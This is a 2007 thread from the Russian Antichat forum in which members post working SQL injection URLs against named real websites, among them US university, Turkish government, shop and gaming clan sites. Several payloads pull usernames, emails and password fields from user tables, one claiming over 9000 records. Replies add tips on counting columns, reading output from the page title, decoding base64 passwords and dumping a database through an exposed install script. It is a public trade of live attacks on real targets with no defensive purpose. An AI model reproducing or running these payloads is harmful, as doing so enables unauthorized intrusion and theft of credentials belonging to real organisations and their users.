HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.05.2007, 12:50
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


По умолчанию

Партия .edu

Код:
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,3,4/*
http://www.montana.edu/cpa/news/nwview.php?article=-4862+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22,23/*
Не подобрал:
Код:
http://bchs.uh.edu/news.php?news=-68+union+select+1/*
http://www.metropolitan.edu/news/newsdetail.php?id=-231+union+select+1,2,3,4/*
http://www.umtri.umich.edu/news.php?id=1455+union+select+1,2,3/*
http://www.mlml.calstate.edu/news/newsdetail.php?nid=-34+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #2  
Старый 26.05.2007, 13:10
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.taksa-shop.ru/index.php?id=-1+union+select+1,password+from+users/*
limit в помощью. Ответ от БД сморим в теги <title></title>
 
Ответить с цитированием

  #3  
Старый 26.05.2007, 14:04
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
По умолчанию

http://www.lada-auto.ru
Type: Oracle
Код:
http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'
 
Ответить с цитированием

  #4  
Старый 26.05.2007, 14:31
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
По умолчанию

gov.tr
Код:
http://www.karabuk.gov.tr/giris/haber.php?id=582345678&kategori=-1'
Код HTML:
http://www.casgem.gov.tr/duyuru.php?uid=-13245'%20union%20select%200,user(),version(),database(),4/*&view=1
uname : casgemuser2@localhost
db: casgemdb2
ver: 4.1.20
 
Ответить с цитированием

  #5  
Старый 01.06.2007, 19:41
RaDDeaD
Познающий
Регистрация: 28.12.2006
Сообщений: 44
Провел на форуме:
119257

Репутация: 56
По умолчанию

Сайты кланов Великой игры , КОМБАТСРУ

Чем паролики зашифрованы ? MD4 (base64) ??

Цитата:
http://www.sdb-clan.ru/?p=comment&id=-1+union+select+1,2,concat(login,0x3a,email,0x3a,pa ss)+from+user/*
и ещё
Цитата:
http://mbclan.org/index.php?page=comments&id=-1+union+select+1,2,3,database(),5/*
Edited by ice1k:
- не стоило писать 7ым размером шрифта: "Сайты кланов Великой игры , КОМБАТСРУ" - это всего лишь сайт отдельного клана.

Последний раз редактировалось ice1k; 01.06.2007 в 21:32..
 
Ответить с цитированием

  #6  
Старый 01.06.2007, 21:31
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


По умолчанию

Цитата:
Сообщение от RaDDeaD  
Чем паролики зашифрованы ? MD4 (base64) ??
Да, это base64.

Цитата:
Сообщение от RaDDeaD  
и ещё
Цитата:
http://mbclan.org/index.php?page=comments&id=-1+union+select+1,2,3,database(),5/*
Можешь подампить базу тут:
_http://mbclan.org/forum/install/upgrade_301.php?step=hello

Последний раз редактировалось ice1k; 01.06.2007 в 21:40..
 
Ответить с цитированием

  #7  
Старый 26.05.2007, 18:22
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

to Кузьмич
Цитата:
http://www.metropolitan.edu/news/newsdetail.php?id=-231+union+select+1,2,3,4/*
Третья версия mysql по-этому и нет union, надо перебором фигачить

Цитата:
http://www.mlml.calstate.edu/news/newsdetail.php?nid=-34+union+select+1,2,3,4,5,6,7/*
Здесь 7 столбцов, 5 принтабельный смотри в title

Последний раз редактировалось [53x]Shadow; 26.05.2007 в 18:36..
 
Ответить с цитированием

  #8  
Старый 26.05.2007, 19:55
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


По умолчанию

Вот ещё .edu
Код:
http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+version(),2,3,4/*
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,3,4/*
 
Ответить с цитированием

  #9  
Старый 26.05.2007, 20:35
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Показал бы хоть что умеешь выводить =\
Код:
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,convert(concat_ws(char(58),user(),version(),database()+using+latin1),4/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

sql
  #10  
Старый 26.05.2007, 22:09
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Цитата:
http://www.shale.ru/page.php?lev1=-7+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,us ername,user_password,user_email),7,8,9,0+from+phpb b_users/*
9000+ записей
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.